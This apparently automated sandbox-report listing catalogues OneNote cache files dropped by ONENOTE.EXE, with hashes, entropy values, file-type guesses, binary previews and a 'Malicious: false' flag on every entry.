Preview:	l...P....&......f%.."&..H....!...@.. `..........l...P....%......f%..>&......!...@.. `..h...............................................................l...P....%......f%......H....!...@.. `..................P..p....DV.r...............rO...s..=..Y......4......@.Y..\. ......v......\. ...=F....:..-..T...=............F.......F....................................................T"......T%...d..T"/.....T%Z...=.T.a..7..T.D..?..T...&..F..............0...........e....4........................~.K$.hcM..~.........(...`E......(...$...B.i.n.o.c.u.l.a.r.s. .C.o.r.n.e.r...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...0...0.0.0.8...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e......................S..&......I......I.G..k.f6...2...........R#......H...6%..h..............d........M....................0...........e....4.........................u.4..G..p.".a.....(...P.u.....(..."...B.l.u.e. .M.i.s.t. .M.a.r.g.i.n...j...P.a.g.e.L.o.c.I.D...L.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.382240034075319
Encrypted:	false
SSDEEP:	48:wsnCINBH5LI2FsYtc0QWE8oAX39CuMczbrdhSrMKtXgZ8T9y5LFp6O45j8YIZI:wscuTCoE8NX39hMaRAXd
MD5:	360A1C5D8899C3418BC93A89DFBC5948
SHA1:	1C9D731CA3396EE2510AE4EDB6818773453BC1D7
SHA-256:	94A558A12CDC32433BA8ED9611B6E20ABCD92A89C78E27890292EBBD63D3B5FE
SHA-512:	7B5B5D7F8A90A961586DF6FF9C844600602C5FCA9DFABAF95BED303CDDA82D35401A1288634BA55BE1E82102F3A1760D33FA69222259473FEEB7C09289F243ED
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.............m..#..o.3c4.....m..#..o.3c4.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............e......).G.S/.....N...^..................!?.,E..G.aOw.........f........................................I.qk..B.....LZ.............e......).G.S/..........e......).G.S/.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.387160040272713
Encrypted:	false
SSDEEP:	48:8s3MYd9nat2ZEp8CXW59VgchrdhSrHgUtXjxk9OY/u+:8sx9aIEpzXw9VgURAx2u
MD5:	D8AD538161B36F42E3BD9C7F6D2FDD61
SHA1:	B3EBFAAEF3909ABB5551BCEF869AF763DEFB0CBC
SHA-256:	160B2C7DE82E92CD1FA5A422BF77AB1D57B9C509A64F39040CD56CFF5AD2D804
SHA-512:	3F307D43E49554C183EFDE5EA58BE382EAE31D87BD7137BF9D2DC2FF01A6DA3303E1BD0A6BCD19522915B4C307373965231430F5A419D578920D28B20AF4E657
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ............O.=..........O.=.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............4.5.:}.........N...^................Q.....E..t8<..u........f........................................I.qk..B.....LZ.............4.5.:}..............4.5.:}.........................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3285340687331955
Encrypted:	false
SSDEEP:	96:EsEf7y9DN9P0E/bOiX8Z1N9BYQRA71GbeqeA4:EsEf7y9DNhB/bOiX8Zb9BYQRA7sbeqeA
MD5:	4A2456491E77FFBC6259984AB32C6D54
SHA1:	816E947B1FC02E3D44D25DD3A0E779E34A1FC9D6
SHA-256:	A1168CFBC89E47D438AD235146ED971CF80653D76BCC244B8F9EA73EC1FA7D0D
SHA-512:	00FCA446B62685FF7B75212B22FCDD4772A9B40DCCE8AF1AB14FD4211BA78A3814C409B2B6A09513391A5F62A0AC7B3A7A0F333ABDFE80B132CA9313103FF5E5
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z.......................................n../.XG1....I.......I.qk..B.....LZ....n../.XG1........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................9........Z.....N...^...............5j...,.N.C............f........................................I.qk..B.....LZ...............9........Z............9........Z.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.6963100705797025
Encrypted:	false
SSDEEP:	48:fWesKdjuU2JleQtUEP3F74hXe9kLacgrdHrnDtXxrPYd7oBP:+es6jutbeQWEP3FEhXe9kLaJRLDTB
MD5:	9A42A1E8F701A8866860D358E343AC51
SHA1:	F9E085A431DDEC5A7C9CC5B80621BAAE8DBC3007
SHA-256:	FF0557D67A182B76366E120595CD69E3EDFE06B1CDE541EDF608E37E13006B34
SHA-512:	A08A5D21B40F6A22EC0FA9448BA15AF0A7F22B580B43D4162B5E52A66FCEA2DAFDBDD9A33250A3855D886A22C0096194A3DCA924F5B5D54219066FFBD07792CA
Malicious:	false
Preview:	X...d...,.......t.......................................................................................................................................X...d...........t................................I.qk..B.....LZ.........................e.G.....................e.G....X...d...........t.............................I.......I...................................................I.t.....I................................................................4..'...'...............................................................?.......?......................................................................................... ....I.qk..B.....LZ....L..........L.......L.......L...........................................Lj......LT%c....L.......L..G....L..H....L..>....L.......L .3...................;........4...4...4.."................L...L...L..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4...........L.......L....#..L............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.5107075683417617
Encrypted:	false
SSDEEP:	48:+aWSdNcUlTQ16WUlII56QUleEUlEBvHUlohp:FWL+Q16WzI5LsXH
MD5:	3193D250FDDF3A4CC286DB9390E24503
SHA1:	342936DDB108B29433B8E0ECE91AE337629A9A3D
SHA-256:	0753FC4FDC025D9201836008C822B7A1E5E1AFAB6E273246B15C5DEF094644D8
SHA-512:	4167E2090F9F723AE52B6B9432743592280B7B100F289DE244FBB788A53A23BF926632E540C0E9BEABAEFBD7206C04E178AA5EEB0AC9A725714064EB635C29C8
Malicious:	false
Preview:	......................................?.................................................................................................................................................................._......._.k.....YZG..^.p.!.....p.!.FIM. .R. ..,...4...u.;qy...,..._.k.....YZG..^.._..p.!.FIM. .R. .p.!...........................................................................j.....`.....8...7...8...Q...8...Z...8...b...8...n....................4..~...1...(...(.......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.T.e.m.p.l.a.t.e.s.\.1.0.3.3.\.O.N.E.N.O.T.E.\.1.6.\.S.t.a.t.i.o.n.e.r.y.......S.t.a.t.i.o.n.e.r.y.............1.......S.t.a.t.i.o.n.e.r.y.............8...1... ..$....S.t.a.t.i.o.n.e.r.y................._....%O...................@.(iq..U.2...............................p.!.....................................p.!..c..,.......................p.!..c..,0............6....B.JS2...\|................8...8...1... ..$....S.t.a.t.i.o.n.e.r.y...........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.61411781055748
Encrypted:	false
SSDEEP:	96:lo6DX/pdFuNAwYvXPlcT0LG1pq6Q6QhQT3aAL/uERkVESYldo7ktFwdi9eTxo:u67pdFJjSiw6QL3lVGxo
MD5:	93C8EAF998EA0309F72C3307C6D29AC3
SHA1:	830AB1A9A7D1BAAC5DB507EEF427E47BED9432E8
SHA-256:	917A9D2430D639B710819AA51992602664256D53C8A85681733825F82AE47568
SHA-512:	B1B2FD0ACCB1F20DD9BF3E1377E9CFEC1256C073C5BFDF7C642D91EA62468F3FEE151B5D99B6EBFE7133D720F27017A54DDAD0A94BABAD8430388E8675F95BCF
Malicious:	false
Preview:	.......@...........@......................................................................................................................................\.......\..^.I.NYT.J.............I...C.;..................x.\|D.0.5V..............I...C.;.........I...C.;..............x.\|D.0.5V.........\..^.I.NYT.J....\.........................................................................N.2.......(.....`......................................................4..~...1...(...(...h...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.T.e.m.p.l.a.t.e.s.......T.e.m.p.l.a.t.e.s...............1.......T.e.m.p.l.a.t.e.s...................1... ..$....T.e.m.p.l.a.t.e.s.........h.......h..L.c.I.........O......O\.U.E.......E2.......&...T....... ................O...\...f.0.{........................\..c..,..............Pa%.-x.A..@...N.....N...^................gm....G.V.l.................................................................................hzTm=.E.G.Sy...........gm.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7449316888901347
Encrypted:	false
SSDEEP:	12:DaC8l8oHgKBTFXDwVhEiDwVZNWDwVhvcQEu:OHl8beaVh6VZNpVu
MD5:	69B7E4EE37E10541EB5E6E0974230EDE
SHA1:	E59ECF57F45317709244BE46A4334155EFD901AD
SHA-256:	F9241E5971F7CEBA21B8A11B3A62DE93AB4BDC9C24322CBA6DB6867CE80C2F59
SHA-512:	A7E4A1B772DE13B553A9D62A4ABE6D79ECDA7354518876B4919AA905D050ED1FE77BB95200070F833824200A39A62961F872EC6C77928A0359343408D6A0099C
Malicious:	false
Preview:	2...>..........................?......................................................................................................................................................................../ 7...../ 7...O...GG.:5j5R.....j5R.-.(A.O)..2.ej5R.-.(A.O)..2.ej5R./ 7...O...GG.:5/ 7..............................j5R.....j5R.................................................j5R..#..j5R\....j5RN.!....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...........1.......L.i.v.e.C.o.n.t.e.n.t............../ 7..c..,...................j5R..1... ..$....L.i.v.e.C.o.n.t.e.n.t.............+M_.].BK..pEJo.....N...^...........................................................................................................+M_.].BK..pEJo.....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.914703509816407
Encrypted:	false
SSDEEP:	12:zPyvBgz5c1/kn1J4GOQgCA1s9lgxKqQE4Kl0:za5gzp1J4GBc1s9lghZ
MD5:	D20C030B53A8192670BAC733CCB2415D
SHA1:	EF19735A32C13A4CB7B46889E6AA5C679E15BFDF
SHA-256:	1535C297F0786C78F5E7836060B8AE73DA7822A9D52F45A663538C7DA58F8FD2
SHA-512:	48EF6F8DA152F8B16D7522A843888B7694E74FDF44B2A319303F73BCD8CB59972F638B6F708B61D6DE03D1C5C79AD4EBBF423761A8CED588733360B1F0392E38
Malicious:	false
Preview:	....>....................................................................................................................................................................................................;O......;O.5.tC.....`'............z..N...i..a..;O.5.tC.....`'.;O....y.5.D..z7.4.........z..N...i..a...............................................................................+.....\.......N.......N.)...............................................c..,.........................4..1...(...(.......1.6.................1... ..$....1.6..................y.5.D..z7.4.............z..N...i..a.2................................;O.......................................;O..c..,............................1... ..$....1.6............h!...rD..cO"y.!....N...^............................................................................................................h!...rD..cO"y.!............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5119232392044595
Encrypted:	false
SSDEEP:	12:KWJKPVEk7k7CPT8NwIUa7EUasXMkFmr1xIrEUa+wCkpV5wDcIHrEUahw/1r1pTIw:K1O00kRylmKrlchWHrl9uHCrll3c
MD5:	A60678610CFE801180B876D36070E250
SHA1:	4F6DD770F4C6C9297D0BA5DAD0B9D1A0ADD10E1B
SHA-256:	0176F1B44BCAAB58B87AFA97C75B286E807B99016B172F084D5F5A8F05730BB8
SHA-512:	332AAC4CBD46EFCA6EFA8FB5D3EE82479A8D6FAA2C3208F4FAAAEAD964B1CF22804E45E31E22E040DFA715945C11E42A601B337BB0AD5055CBC6809E01124D5F
Malicious:	false
Preview:	.........................................................................................................................................................................................................5.......58..kN.q.>.\|....O.......O. ..@..T{..,[..O. ..@..T{..,[..O..U..B.JG.pp./Zf^.U......\.G.H..0.................O.......O...................................................O..B....O\......ON......ON.....ON.7....ON.@...............................c..,.........................4..1...(...(.......M.a.n.a.g.e.d............O..1... ..$....M.a.n.a.g.e.d.............N.i.....N.i...K..yl.....U.......U..B.JG.pp./Zf.2.................................O.N.i...................................U...c..,.....................O...O..1... ..$....M.a.n.a.g.e.d.............\.G.H..0......N.i...K..yl....N.i...58..kN.q.>.\|....5.....>................U..B.JG.pp./Zf^...........................................5..c..,.....................O...O...O..1... ..$....M.a.n.a.g.e.d.........................\.G.H..0...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7126528614026032
Encrypted:	false
SSDEEP:	6:jxfEXEjXzPaEA0aEAazUufY/2HqUKHx8CAXCkKaWWAXl++iAjcw1EUAtK:KUjjap0apHgY+KOXnKaW9XlUPQEUAK
MD5:	05FE9E7678300BA9B62B81E47202C379
SHA1:	73DA16987BD1FB3D27EB3A55426BD7C688B33C12
SHA-256:	035F2A07A9DFC47770DF4C4E99140F5B4326A9663945F56BFB18623ACBD1ADDB
SHA-512:	80C7297336972C2870978B84C0C0589861DBD2FB4A67B2C2ABC9F2DB7058D1A8ED5995131627D65AA3FCDDC5E63B4CECC891B2AC0B24FADE59C8243EBC7F4E3A
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................~.......~...\|.oK.!.g.9..tem.....tem..f.G...#....tem..f.G...#....tem.~...\|.oK.!.g.9..~................................tem.....tem.................................................tem..!..tem\....temN....................................................~....c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........tem..1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s....................@.!.'........N...^..................................................................................................................@.!.'................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47843155407951077
Encrypted:	false
SSDEEP:	6:NTc4oSK+gjkuauK+gjba8ji2pqlyLx8Olu3afiaeljlcw1E9aeltlK:Vc4oys8eRlV38iawlcQE9ah
MD5:	4FE773BB727EBCDEA1712DBF9895040C
SHA1:	86B71A58D1CDF6B40A1229CEDFEFCC5551740B35
SHA-256:	05E67938825C75057FA8A6494A72FA8FE9EE238EE6B71D347D2F8D9E39FC4FB8
SHA-512:	8DC2916C722EB6D248723A67174C85B539D0EBDA59FF2AAF8910F9172FC16B79DA42DF30D5837A65A02FC68899B7384414D924BCC239C4ABFFB54AAEFACF52F4
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................j.F.....j.F7..^G.#..A.@.........................j.F7..^G.#..A.@.j.F..................................................j.F.....j.F.................................................j.F.....j.F\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....al..M.N.....1....N...^.............................................................................................................al..M.N.....1............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7337614712920891
Encrypted:	false
SSDEEP:	12:KUCNyBqysdljltUvhzeIWU7eIWc11vNQELvl:KUGyoyaZmzh73N3
MD5:	F31EA1ED4F8A4C394A5A81F74C4DAE95
SHA1:	36AC069850F0BB8E333A0334B14A558D3AED1083
SHA-256:	5FEF58418BC70D29FA22A60A09D504FAB8F004065D16F899F20800C5B49C2E04
SHA-512:	18DE2400CE0270560FD90525D3F3377E3036FE9B84EB62776A7C4085D379662EBBA1975185AF2CB4B35BAAA58C99EBB3914DD6C41896DB6508A3F99A12242357
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................9.......9....B.....tC.........5._.G...Wl.L#..9....B.....tC..9...5._.G...Wl.L#..................................9.......9...................................................9.."....9\......9N........................................................c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................9..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........f.s..G..0W......N...^...........................................................................................................f.s..G..0W......................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4693374260840487
Encrypted:	false
SSDEEP:	6:NTcZJsJtlRcT/ln17tlyLx8Olu3afsBhYw1ExBhk:VcghspXlV38sXYQExXk
MD5:	408BE078C05637E3A32EC6F072BC7F8B
SHA1:	A0DB4D627A81E04B17EA20C03580D8263B5060ED
SHA-256:	0FFD0A281489D4ECBDE46E4CEB80635ACBA2E72D26E0E83DA4070CF4A05650FD
SHA-512:	05A0E212AC4356CA2B3E8F633EE5F654D531411248C4AC132D5AA0F2054773D248ADC1DB8F54D5ED38978751038C2A463A015A0729E75F4DAD246754BC649ACD
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................5.......5..2..B...R.n...........................5..2..B...R.n...5....................................................5.......5...................................................5.......5.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...?\.q...F......h.....N...^...........................................................................................................?\.q...F......h.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.644250042985299
Encrypted:	false
SSDEEP:	6:UWBEqqm/QdzVeWEVKELx88cbrMkq2Sz1MQQcbrMkq2Sz1PVl50mw1E3Vl560:UeEM6zVr89nkNYKQQnkNYpzumQE3zj
MD5:	D649CAE49805754A10A5E892EDDD24B6
SHA1:	519874C06480836B7455F9E1E8E205BD17EBF5D0
SHA-256:	45072E608D43DC6BBC6A38F10E263FE7FDDB7B3D17C9DC8154881790CD8478BD
SHA-512:	A2608B2697B4D23F0274A184E10170288FB4F34FEA95ABF74F539BD02618B4AEE75765799395B78F01E0E97BBA1B23CCD729309460E25167E8FA005EB6FF1E7E
Malicious:	false
